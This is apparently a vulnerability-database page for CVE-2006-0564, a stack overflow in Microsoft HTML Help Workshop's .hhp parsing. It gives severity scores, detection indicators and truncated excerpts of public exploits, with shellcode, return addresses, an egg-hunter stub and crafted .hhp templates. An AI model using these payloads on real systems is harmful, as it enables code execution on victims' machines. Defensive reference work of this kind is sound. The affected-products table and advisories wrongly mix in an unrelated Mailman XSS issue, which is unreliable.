CVE-2006-0564
published 2006-02-06CVE-2006-0564: Stack-based buffer overflow in Microsoft HTML Help Workshop 4.74.8702.0, and possibly earlier versions, and as included in the Microsoft HTML Help 1.4 SDK…
PriorityP348high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
71.46%
99.3th percentile
Stack-based buffer overflow in Microsoft HTML Help Workshop 4.74.8702.0, and possibly earlier versions, and as included in the Microsoft HTML Help 1.4 SDK, allows context-dependent attackers to execute arbitrary code via a .hhp file with a long Contents file field.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gnu | mailman | >= 0 < 1:2.1.10~b3-1 | 1:2.1.10~b3-1 |
| microsoft | html_help | — | — |
| microsoft | html_help_workshop | — | — |
| microsoft | html_help_workshop | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x5d\x38\x82\x7c (JMP ESP return address, repeated)
bytes↗
\x5d\x38\x82\x7c (JMP ESP, used at offsets 272-292)
bytes↗
\x77\xe8\x59\xba (return address at overflow[280])
bytes↗
\x93\x1f\x40\x00 (Call EDI - hhw.exe universal)
bytes↗
Egg hunter stub: \x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x69\x72\x61\x71\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7
bytes↗
Egg tag marker: \x69\x72\x61\x71\x69\x72\x61\x71 (iraqiraq)
- →Exploit .hhp files contain NOP sleds (0x90) followed by shellcode in the 'Compiled file=' or 'Contents file=' field; look for large blocks of 0x90 bytes in .hhp file fields. ↗
- →Exploit .hhp files use the egg-hunter tag bytes 'iraq' (\x69\x72\x61\x71) doubled as the egg marker preceding shellcode in the [FILES] section. ↗
- →Return address 0x7C82385D (JMP ESP in a Windows XP system DLL) appears repeatedly at the EIP overwrite offset (~272 bytes into the overflow buffer); flag .hhp files containing this byte sequence. ↗
- →Return address 0x00401F93 (CALL EDI in hhw.exe v4.74.8702.0) is used by the Metasploit module at offset 242 bytes into the overflow; presence of bytes \x93\x1f\x40\x00 at that offset in a .hhp file is a strong indicator. ↗
- ·The Metasploit module sets BadChars to null bytes, newlines, carriage returns, SUB, forward-slash, and backslash, meaning shellcode containing these bytes will not work; payloads must be encoded to avoid them. ↗
- ·The Metasploit module uses a StackAdjustment of -4800 bytes to ensure the stack pointer does not corrupt the payload during execution. ↗
- ·The return address 0x7C82385D (JMP ESP) is specific to Windows XP SP2 system DLLs and will not be valid on other OS versions or patch levels. ↗
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv6.8MEDIUM
vendor_redhat6.8MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-fpp9-rfqj-mpm6: Buffer overflow in Microsoft HTML Help Workshop 4
ghsa_unreviewed·2022-05-02·CVSS 7.5
CVE-2009-0133 [HIGH] CWE-119 GHSA-fpp9-rfqj-mpm6: Buffer overflow in Microsoft HTML Help Workshop 4
Buffer overflow in Microsoft HTML Help Workshop 4.74 and earlier allows context-dependent attackers to execute arbitrary code via a .hhp file with a long "Index file" field, possibly a related issue to CVE-2006-0564.
GHSA
GHSA-937c-j3f9-3p46: Stack-based buffer overflow in Microsoft HTML Help Workshop 4
ghsa_unreviewed·2022-05-01
CVE-2006-0564 [HIGH] GHSA-937c-j3f9-3p46: Stack-based buffer overflow in Microsoft HTML Help Workshop 4
Stack-based buffer overflow in Microsoft HTML Help Workshop 4.74.8702.0, and possibly earlier versions, and as included in the Microsoft HTML Help 1.4 SDK, allows context-dependent attackers to execute arbitrary code via a .hhp file with a long Contents file field.
OSV
CVE-2008-0564: Multiple cross-site scripting (XSS) vulnerabilities in Mailman before 2
osv·2008-02-05·CVSS 6.8
CVE-2008-0564 CVE-2008-0564: Multiple cross-site scripting (XSS) vulnerabilities in Mailman before 2
Multiple cross-site scripting (XSS) vulnerabilities in Mailman before 2.1.10b1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to (1) editing templates and (2) the list's "info attribute" in the web administrator interface, a different vulnerability than CVE-2006-3636.
Red Hat
mailman: XSS triggerable by list administrator
vendor_redhat·2008-01-03·CVSS 6.8
CVE-2008-0564 [MEDIUM] CWE-79 mailman: XSS triggerable by list administrator
mailman: XSS triggerable by list administrator
Multiple cross-site scripting (XSS) vulnerabilities in Mailman before 2.1.10b1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to (1) editing templates and (2) the list's "info attribute" in the web administrator interface, a different vulnerability than CVE-2006-3636.
Package: mailman (Red Hat Enterprise Linux 6) - Not affected
No detection rules found.
Exploit-DB
Microsoft HTML Help Workshop 4.74 - '.hhp' compiled Buffer Overflow (Metasploit) (4)
exploitdb·2010-09-25
CVE-2006-0564 Microsoft HTML Help Workshop 4.74 - '.hhp' compiled Buffer Overflow (Metasploit) (4)
Microsoft HTML Help Workshop 4.74 - '.hhp' compiled Buffer Overflow (Metasploit) (4)
---
##
# $Id: hhw_hhp_compiledfile_bof.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit',
'Description' => %q{
This module exploits a stack buffer overflow in HTML Help Workshop 4.74
By creating a specially crafted hhp file, an an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'bratax', 'jduck' ],
'Version' => '$Re
Exploit-DB
Microsoft HTML Help Workshop 4.74 - '.hhp' Cotent Buffer Overflow (Metasploit) (2)
exploitdb·2010-09-25
CVE-2006-0564 Microsoft HTML Help Workshop 4.74 - '.hhp' Cotent Buffer Overflow (Metasploit) (2)
Microsoft HTML Help Workshop 4.74 - '.hhp' Cotent Buffer Overflow (Metasploit) (2)
---
##
# $Id: hhw_hhp_contentfile_bof.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit',
'Description' => %q{
This module exploits a stack buffer overflow in HTML Help Workshop 4.74
By creating a specially crafted hhp file, an an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'bratax', 'jduck' ],
'Version' => '$Revis
Exploit-DB
Microsoft HTML Help Workshop 4.74 - '.hhp' Local Buffer Overflow (1)
exploitdb·2009-12-05
CVE-2009-0133 Microsoft HTML Help Workshop 4.74 - '.hhp' Local Buffer Overflow (1)
Microsoft HTML Help Workshop 4.74 - '.hhp' Local Buffer Overflow (1)
---
#exploit.py
#
# HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit
# By: Encrypt3d.M!nd
# http://m1nd3d.wordpress.com/
# Based on: http://www.milw0rm.com/exploits/7727
####################################################################
# Well, I've tested SKD Exploit on Win 7 and didn't work.I Think it's
# Shellhunter compatibility problem. so i wrote this and used egg hunting-
# method. Would take some time to execute the shellcode,but it will run ;-)
#
# Tested on : Windows xp sp3
# Windows 7 ultimate
#
hhp_data1 =("\x5B\x4F\x50\x54\x49\x4F\x4E\x53"
"\x5D\x0D\x0A\x43\x6F\x6E\x74\x65"
"\x6E\x74\x73\x20\x66\x69\x6C\x65"
"\x3D\x41\x0D\x0A\x49\x6E\x64\x65"
"\x78\x20\x66\x69\x6C\x65\x3D")
crlf =("\x
Exploit-DB
Microsoft HTML Workshop 4.74 - Universal Buffer Overflow
exploitdb·2009-01-12
CVE-2009-0133 Microsoft HTML Workshop 4.74 - Universal Buffer Overflow
Microsoft HTML Workshop 4.74 - Universal Buffer Overflow
---
#!/usr/bin/perl
# Microsoft HTML Workshop http://msdn.microsoft.com/en-us/library/ms669985.aspx
#
# If you are interested in my method and want to learn something new or
# improve your exploitation skills then visit my team's blog at:
# -> http://abysssec.com
#
# Peace out,
# SkD.
my $hhp_data1 = "\x5B\x4F\x50\x54\x49\x4F\x4E\x53".
"\x5D\x0D\x0A\x43\x6F\x6E\x74\x65".
"\x6E\x74\x73\x20\x66\x69\x6C\x65".
"\x3D\x41\x0D\x0A\x49\x6E\x64\x65".
"\x78\x20\x66\x69\x6C\x65\x3D";
my $hhp_data2 = "\x5B\x46\x49\x4C\x45\x53\x5D\x0D".
"\x0A\x61\x2E\x68\x74\x6D";
my $crlf = "\x0d\x0a";
# win32_exec - EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\
Exploit-DB
Microsoft HTML Help Workshop - '.hhp' Local Buffer Overflow (3)
exploitdb·2006-02-14
CVE-2006-0564 Microsoft HTML Help Workshop - '.hhp' Local Buffer Overflow (3)
Microsoft HTML Help Workshop - '.hhp' Local Buffer Overflow (3)
---
/*
\ Windows HTML Help Workshop Index File Stack Overflow Exploit
/ by Darkeagle
\
/ [http://eagle.blacksecurity.org]
\
/ MS coders codes so secure code. Keep coding }:>
\
/ Original Advisory: http://eagle.blacksecurity.org/stuff/unl0ck/adv/55k700206.txt
\
/ Exploit tested in WinXP SP2 RUS.
\
*/
#include
#include
#include "stdafx.h"
char ep[]=
"[OPTIONS]\n"
"Compatibility=1.1 or later\n"
"Compiled file=XAKEP.chm\n"
"Index File=";
char pro[]=
"Display compile progress=No\n"
"Language=0x43f Êàçàõñêèé\n\n\n"
"[INFOTYPES]";
char shellcode[]=
"\x54\x50\x53\x50\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x02"
"\xdd\x0e\x4d\x83\xee\xfc\xe2\xf4\xfe\x35\x4a\x4d\x02\xdd\x85\x08\x3e\x56\x72\x48"
"\x7a\xdc\xe1\xc6
Exploit-DB
Microsoft HTML Help Workshop - '.hhp' Local Buffer Overflow (2)
exploitdb·2006-02-11
CVE-2009-0133 Microsoft HTML Help Workshop - '.hhp' Local Buffer Overflow (2)
Microsoft HTML Help Workshop - '.hhp' Local Buffer Overflow (2)
---
/*
Microsoft HTML Help Workshop .hhp file Compiled File Header Buffer Overflow Exploit
The Buffer Overlfow in Compiled File in Options in a HHP file.
Bug found by:darkeagle
Exploit coded by:k3xji
Mail:[email protected]
Web: www.guvenliklab.com
Tested:Win XP SP2
*/
#include
#include
#include
#define BUFLEN 0xe6
char sta[]=
"[OPTIONS]\n"
"Compatibility=1.1 or later\n"
"Compiled file=";
char fin[]=
"Display compile progress=No\n"
"Language=Turkish\n\n\n"
"[INFOTYPES]";
char jmpcode[]= "\x5d\x38\x82\x7c\x5d\x38\x82\x7c\x90\x90\x90\x90\x83\xEC\x34\x90\x83\xEC\x78\x90\xFF\xE4\x90\x90";
char shellcode[]=
//Taken from ATmaCA's Execute Calc.exe shellcode.Thx.A bit lazy to call ExitProcess:P
"\x54\x50\x53\x50\x29\xc9\x83\xe9
Exploit-DB
Microsoft HTML Help Workshop - '.hhp' Denial of Service
exploitdb·2006-02-10
CVE-2006-0564 Microsoft HTML Help Workshop - '.hhp' Denial of Service
Microsoft HTML Help Workshop - '.hhp' Denial of Service
---
[OPTIONS]
Compatibility=1.1 or later
Compiled file=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaUUUUr0xaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Display compile progress=No
Language=0x419 Ðóññêèé
[INFOTYPES]
# milw0rm.com [2006-02-10]
Exploit-DB
Microsoft HTML Help Workshop - '.hhp' Local Buffer Overflow (1)
exploitdb·2006-02-06
CVE-2009-0133 Microsoft HTML Help Workshop - '.hhp' Local Buffer Overflow (1)
Microsoft HTML Help Workshop - '.hhp' Local Buffer Overflow (1)
---
/*
Microsoft HTML Help Workshop .hhp file Buffer Overflow Exploit
by bratax (http://www.bratax.be/)
-> greets to:
all my miffm00f buddies, BuzzDee and everyone else I forgot who should be in here
-> thx to:
Curt Wilson @ SIUC (maybe you don't know why but this exploit wouldn't
exist if we didn't have that conversation a long long time ago)
nolimit & buzzdee (I used most of your realplayer .smil exploit code because I
didn't feel like writing this code from scratch :p)
-> special thx to:
duksie, dwarf & turb00 (you guys know why)
C:\htmlws>poc2
Microsoft HTML Help Workshop Buffer Overflow.
Coded by bratax (http://www.bratax.be/).
Usage: C:\htmlws\PoC2.exe
C:\htmlws>poc2 new.hhp
File written.
Open with Microsoft Help Wo
Metasploit
HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow
metasploit
HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow
HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow
This module exploits a stack buffer overflow in HTML Help Workshop 4.74 by creating a specially crafted hhp file.
Metasploit
HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow
metasploit
HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow
HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow
This module exploits a stack buffer overflow in HTML Help Workshop 4.74 By creating a specially crafted hhp file, an attacker may be able to execute arbitrary code.
No writeups or analysis indexed.
http://secunia.com/advisories/18740http://securitytracker.com/id?1015585http://users.pandora.be/bratax/advisories/b008.htmlhttp://www.kb.cert.org/vuls/id/124460http://www.osvdb.org/22941http://www.vupen.com/english/advisories/2006/0446https://exchange.xforce.ibmcloud.com/vulnerabilities/24481http://secunia.com/advisories/18740http://securitytracker.com/id?1015585http://users.pandora.be/bratax/advisories/b008.htmlhttp://www.kb.cert.org/vuls/id/124460http://www.osvdb.org/22941http://www.vupen.com/english/advisories/2006/0446https://exchange.xforce.ibmcloud.com/vulnerabilities/24481
2006-02-06
Published